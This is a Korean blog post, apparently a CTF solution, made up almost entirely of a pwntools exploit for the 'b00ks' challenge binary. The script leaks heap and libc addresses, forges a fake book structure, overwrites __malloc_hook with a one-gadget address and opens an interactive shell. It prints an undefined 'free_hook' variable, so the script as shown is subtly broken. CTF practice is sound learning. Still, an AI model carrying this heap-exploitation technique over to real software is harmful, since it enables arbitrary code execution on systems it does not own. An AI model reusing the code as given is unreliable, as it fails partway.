728x90

간만에 풀어본 CTF문제! 재미있었다!! 모두 새해복 많이 받으세요 m(_ _)m


from pwn import *

s = process("./b00ks")
elf = ELF("./b00ks")
libc = ELF("./libc")

def first(name):
    s.recvuntil("Enter author name: ")
    s.sendline(name)
    


def create(size,name,dis_size,content):
    s.recvuntil("> ")
    s.sendline("1")
    s.recvuntil("Enter book name size: ")
    s.sendline(str(size))
    s.recvuntil("Enter book name (Max 32 chars): ")
    s.sendline(name)
    s.recvuntil("Enter book description size: ")
    s.sendline(str(dis_size))
    s.recvuntil("Enter book description: ")
    s.sendline(content)

def delete(number):
    s.recvuntil("> ")
    s.sendline("2")
    s.recvuntil("Enter the book id you want to delete: ")
    s.sendline(str(number))
    

def edit(ids,disc):
    s.recvuntil("> ")
    s.sendline("3")
    s.recvuntil("Enter the book id you want to edit: ")
    s.sendline(str(ids))
    s.recvuntil("Enter new book description: ")
    s.sendline(disc)
    

def show():
    s.recvuntil("> ")
    s.sendline("4")
    
    

def change(name):
    s.recvuntil("> ")
    s.sendline("5")
    s.recvuntil("Enter author name: ")
    s.sendline(name)

def quit():
    s.recvuntil("> ")
    s.sendline("6")


first("K"*32)

create(128,"1"*128,128,"A"*128)

show()

s.recvuntil("K"*32)
heap = u64(s.recv(6)+"\x00\x00")
print "heap : " + hex(heap)

delete(1)

pay = "B"*(8*10)
pay += p64(31337)
pay += p64(heap+0x30)
pay += p64(heap - 0x60)
create(128,"2"*128,128,pay)
create(128,"3"*128,128,"C"*128)
create(128,"4"*128,128,"D"*128)

delete(3)

change("K"*32)

show()

s.recvuntil("Name: ")
leak = u64(s.recv(6)+"\x00\x00")
print "leak : " + hex(leak)
libc_base = leak - 0x3c4b78
malloc_hook = libc_base + libc.symbols['__malloc_hook']
one_shot = libc_base + 0xf02a4
print "libc_base : " + hex(libc_base)
print "free_hook : " + hex(free_hook)
print "malloc_hook : " + hex(malloc_hook)
print "one_shot : " + hex(one_shot)

pay = "B"*32
pay += p64(31337)
pay += p64(heap+0x30)
pay += p64(malloc_hook)
edit(31337,pay)

edit(31337,p64(one_shot))

delete(31337)

s.interactive()


'PWN > CTF' 카테고리의 다른 글

[Hackingcamp 19] sms_service  (0) 2019.02.20
[Asis 2015] math sequence  (0) 2019.02.15
[Codegate 2019] got-the-reum  (0) 2019.02.05
[codegate 2018] marimo  (0) 2019.01.24
[mma_2016] greeting  (0) 2019.01.18